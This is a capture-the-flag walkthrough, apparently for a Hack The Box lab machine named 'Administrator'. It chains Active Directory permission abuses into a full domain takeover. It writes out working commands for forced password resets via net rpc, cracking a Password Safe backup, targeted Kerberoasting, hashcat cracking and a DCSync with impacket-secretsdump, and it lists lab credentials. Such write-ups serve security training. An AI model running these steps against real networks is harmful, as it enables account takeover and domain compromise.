Administrator
Initial machine information
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:
Username: Olivia
Password: ichliebedichOverview
Administrator is a classic Active Directory privilege escalation chain. Starting credentials (Olivia) give access to BloodHound data which maps a chain: Olivia has GenericAll over Michael, Michael has ForcePasswordChange over Benjamin, Benjamin has FTP access to a Password Safe backup. The psafe3 backup cracks with john, revealing Emily's credentials. Emily has GenericWrite over Ethan who has DCSync rights - targeted Kerberoasting Ethan gives a crackable hash, and DCSync yields the Administrator hash.
Recon
Nmap
sudo nmap -sC -sV -vv -oA tcp 10.129.2.149 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.2.149Starting credentials: Olivia:ichliebedich
Validate and check the initial user's access:
Time Synchronisation
Kerberos requires clock synchronisation. Sync to the DC:
ntpdate 10.129.2.149BloodHound Collection
bloodhound-ce-python -c all -u Olivia -p ichliebedich -d administrator.htb \
-dc administrator.htb --dns-tcp -ns 10.129.2.149BloodHound Path Analysis
Ethan has DCSync rights:
Emily has GenericWrite over Ethan - can targeted Kerberoast him:
Olivia has GenericAll over Michael - can reset his password:
Michael has ForcePasswordChange over Benjamin:
Full chain: Olivia → Michael → Benjamin → FTP → psafe3 → Emily → Ethan → DCSync → Administrator
Enumerate services before working through the chain:
Foothold
Step 1 - Olivia resets Michael's password
GenericAll is the most permissive AD right - it includes the ability to reset passwords without knowing the current one:
net rpc password "michael" "newP@ssword2022" \
-U "administrator.htb"/"Olivia"%"ichliebedich" -S "10.129.2.149"Step 2 - Michael forces Benjamin's password change
ForcePasswordChange (WriteProp on pwdLastSet) allows resetting another user's password:
net rpc password "BENJAMIN" "newP@ssword2022" \
-U "administrator.htb"/"michael"%"newP@ssword2022" -S "10.129.2.149"Step 3 - Benjamin's FTP Access
Benjamin has access to FTP:
A backup.psafe3 file is found:
Step 4 - Crack the Password Safe
Use john the ripper with the pwsafe2john utility to convert the psafe3 file to a crackable format:
Step 5 - Open the Password Safe
Install pwsafe and open backup.psafe3 with the cracked master password:
The vault contains credentials including Emily's. Test Emily's credentials:
Privilege Escalation
Targeted Kerberoast - Ethan
Emily has GenericWrite over Ethan. Use targetedKerberoast to set an SPN on Ethan and request his TGS:
python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' \
-p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' \
-o /mnt/hgfs/I/data/htb/machines-stream/administrator/loot/ethan_hash -f hashcatCrack Ethan's hash:
hashcat -m 13100 -a 0 ethan_hash /mnt/hgfs/I/data/rockyou.txtCracked: Ethan:limpbizkit
DCSync
Ethan has DCSync rights (DS-Replication-Get-Changes-All). Use impacket-secretsdump to extract the Administrator hash:
impacket-secretsdump -just-dc-user Administrator \
administrator.htb/ethan:[email protected]Pass-the-Hash with the Administrator NTLM hash for the root flag.
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | BloodHound | Full ACL chain mapped |
| GenericAll | net rpc password reset | Michael credentials |
| ForcePasswordChange | net rpc password reset | Benjamin credentials |
| FTP | Download backup.psafe3 | Password Safe file |
| Credential access | john + pwsafe | Emily credentials |
| Targeted Kerberoast | GenericWrite → SPN → TGS | Ethan:limpbizkit |
| DCSync | impacket-secretsdump | Administrator NT hash |